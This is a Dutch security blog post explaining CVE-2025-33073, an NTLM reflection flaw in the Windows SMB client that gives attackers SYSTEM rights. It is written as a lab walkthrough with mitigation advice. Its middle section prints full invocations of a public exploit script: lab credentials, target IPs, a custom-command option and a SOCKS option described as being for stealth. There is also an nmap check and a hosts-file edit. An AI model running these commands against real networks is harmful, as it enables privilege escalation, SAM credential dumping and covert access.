SHELL SESSIONS REGISTER NOW FOR THE OKTOBER SESSION [ only 20 seats available ]
Jarno Baselier > Security > CVE-2025-33073 – Zero Day NTLM Reflection Vulnerability

CVE-2025-33073 – Zero Day NTLM Reflection Vulnerability

Stel je voor: je bent een systeembeheerder, je nipt van je koffie, en ineens hoor je over een nieuwe zero-day kwetsbaarheid die je Windows-netwerk op zijn kop kan zetten. Dat is precies wat CVE-2025-33073 doet, een moderne draai aan een oude truc genaamd NTLM-reflectie, gericht op het Server Message Block (SMB)-protocol. Laten we deze kwetsbaarheid ontleden en ontdekken waarom het zoā€™n groot probleem is voor iedereen met een “net-niet gepatchete” Windows-omgeving.

Wat zijn NTLM en Reflectie eigenlijk?

Als je met Windows-systemen werkt, ben je vast wel eens NTLM tegengekomen. Dit is Microsofts oude en vertrouwde authenticatieprotocol dat al jaren meegaat. Betrouwbaar, maar met een wat dubieuze reputatie op beveiligingsgebied. Een reflectie-aanval? Dat is wanneer een slimme aanvaller het NTLM-authenticatieverzoek van een slachtoffer terugkaatst naar het slachtoffer of een andere dienst, om zo toegang te krijgen. Zie het als iemand die jouw toegangspas steelt, deze aan de bewaker laat zien en zo jouw kantoor binnenwandelt.

CVE-2025-33073 is een zero-day kwetsbaarheid in de Windows SMB-client, specifiek in de mrxsmb.sys-driver. Het is een gemene: een aanvaller met geldige netwerktoegang kan zijn rechten opschalen naar SYSTEM-niveau. De ultieme privilege escalation! Deze fout maakt gebruik van zwakke toegangscontroles in het SMB-protocol, waardoor een aanvaller een doelcomputer kan misleiden om te authenticeren naar een kwaadaardige SMB-server. Het resultaat? Volledige controle over het systeem. Microsoft heeft dit gat gedicht in de Patch Tuesday van juni 2025, maar als je updates hebt gemist, loop je risico.

Waarom deze kwetsbaarheid zo gevaarlijk is

Wat deze exploit zo bedreigend maakt, is hoe wijdverspreid SMB is in Windows-omgevingen. Heb je SMB-clients in je netwerk (en eerlijk, wie niet)? Als je geen SMB-signing verplicht stelt, ben je kwetsbaar. SMB-signing zorgt ervoor dat authenticatieverzoeken worden gecontroleerd, maar zonder deze beveiliging kunnen aanvallers NTLM-referenties reflecteren naar het slachtoffer, wat SYSTEM-rechten oplevert.

De originele aanval werkt door een DNS record aan de DNS server toe te voeren. Maar in sommige gevallen heeft de aanvaller geen DNS-trucjes nodig. Als het doelsysteem vatbaar is voor LLMNR-poisoning (een veelvoorkomende misconfiguratie in Windows-netwerken), kan een aanvaller in hetzelfde broadcast-domein de naamresolutie vervalsen, waardoor het slachtoffer denkt dat het met een legitieme server praat. Als het aanmaken van een DNS record niet werkt en LLMNR-poisoning ook niet dan kan de aanvaller nog altijd het “hosts-bestand” aanpassen op de client om de name resolution te misleiden.

Hoe de aanval werkt

Laten we stap voor stap door de aanval lopen, alsof we in de schoenen van de aanvaller staan (probeer dit niet thuis, tenzij je in een gecontroleerde testomgeving werkt!).

Stap 1: De val opzetten
De aanvaller start een kwaadaardige SMB-server met tools zoals Impacketā€™s ntlmrelayx. Deze server staat klaar om NTLM-authenticatieverzoeken van het doel te vangen. De exploit welke we in onderstaande voorbeeld gebruiken (https://github.com/mverschu/CVE-2025-33073) automatiseert dit alles door een SMB-server te starten op het IP-adres van de aanvaller en via dnstool.py een DNS record aan te maken op de DNS server.

Stap 2: Het slachtoffer misleiden
Het script stuurt een kwaadaardig verzoek naar het doelsysteem, waardoor het een SMB-verbinding start. Door de zwakke toegangscontroles in de SMB-client (de kwetsbaarheid) probeert het systeem te authenticeren naar de server van de aanvaller. Hier komt NTLM-reflectie om de hoek kijken: de referenties van het doel worden onderschept en teruggekaatst naar het systeem zelf, wat leidt tot een geauthenticeerde sessie met SYSTEM-rechten.

Stap 3: Volledige controle
Met SYSTEM-toegang kan de aanvaller doen wat hij wil: de SAM-database dumpen (waar gebruikersreferenties staan), willekeurige commandoā€™s uitvoeren, of zelfs heimelijk te werk gaan met SOCKS-proxyā€™s. De eerder genoemde exploit biedt al deze opties zoals –cli-only voor uitvoering via de opdrachtregel of –custom-command om specifieke taken uit te voeren.

Voorwaarden voor de aanval

Deze exploit is niet voor iedereen zomaar uitvoerbaar. Er zijn een paar voorwaarden:

  • Geldige referenties: De aanvaller heeft al een gebruikersnaam en wachtwoord van het netwerk nodig.
  • Tools: Python-modules zoals Impacket en NetExec zijn essentieel.
  • Geen SMB-signing: Het doelsysteem moet SMB-signing uitgeschakeld hebben, anders blokkeert dit de NTLM-reflectie.

De exploit uitvoeren: Een kijkje in de commandoā€™s

Hier is een voorbeeld van hoe een aanvaller dit in een testomgeving zou kunnen uitvoeren (nogmaals, alleen in een geautoriseerde omgeving). Eerst controleren we of SMB-signing uit staat:

nmap -sC -sV -p445 -vvv 172.16.200.210

Omdate we hostnems gebruiken passen we ons eigen hosts-bestand aan zodat ook hier de name-resolution goed gaat.

echo "192.168.200.201 DC01.ospathway.local" | sudo tee -a /etc/hosts

Dan zijn we klaar om de exploit uit te voeren:

Exploit met GUI:

python3 CVE-2025-33073.py -u 'ospathway.local\user1' -p 'Password123' --attacker-ip 172.16.200.10 --dns-ip 172.16.200.201 --dc-fqdn DC01.ospathway.local 
--target Client01-Win10.ospathway.local --target-ip 172.16.200.210

Exploit – Alleen CLI:

python3 CVE-2025-33073.py -u 'ospathway.local\user1' -p 'Password123' --attacker-ip 172.16.200.10 --dns-ip 172.16.200.201 --dc-fqdn DC01.ospathway.local 
--target Client01-Win10.ospathway.local --target-ip 172.16.200.210 --cli-only

Exploit – Voer een custom commando uit:

python3 CVE-2025-33073.py -u 'ospathway.local\user1' -p 'Password123' --attacker-ip 172.16.200.10 --dns-ip 172.16.200.201 --dc-fqdn DC01.ospathway.local 
--target Client01-Win10.ospathway.local --target-ip 172.16.200.210 --cli-only --custom-command "whoami"

Exploit – Gebruik SOCKS (voor stealth):

python3 CVE-2025-33073.py -u 'ospathway.local\user1' -p 'Password123' --attacker-ip 172.16.200.10 --dns-ip 172.16.200.201 --dc-fqdn DC01.ospathway.local 
--target 172.16.200.210 --target-ip 172.16.200.210 --cli-only --socks

Je netwerk beschermen

Hoe voorkom je dat je slachtoffer wordt van deze exploit? Ten eerste, patch je systemen. Microsofts update van juni 2025 fixt dit probleem, dus sla Patch Tuesday niet over. Ten tweede, schakel SMB-signing in op je netwerk. Dit is een relatief simpele instelling die NTLM-reflectieaanvallen blokkeert. En tot slot, houd LLMNR in de gaten en schakel het uit als het kan, of zorg dat je DNS-configuratie waterdicht is om zogenaamde “poisoning” te voorkomen.

Conclusie

CVE-2025-33073 is een harde herinnering dat oude kwetsbaarheden zoals NTLM-reflectie kunnen terugkomen in een nieuw, angstaanjagend jasje. Het is een wake-up call voor iedereen die een Windows-netwerk beheert: blijf up-to-date, dwing SMB-signing af en controleer je configuraties. De dagen van NTLM-reflectie lijken misschien geteld, maar zolang SMB een pijler is in Windows-omgevingen, zullen aanvallers manieren vinden om deze techniek nieuw leven in te blazen. Blijf alert, en houd die koffie bij de hand…je hebt hem nodig.

Video

Beelden zeggen meer dan 1000 woorden. Wil je bovenstaande ook gedemonstreerd hebben in een video…? Ook deze heb ik voor je gemaakt! Zie:

Zoeken:
Search

Meer resultaten...

Generic filters
Top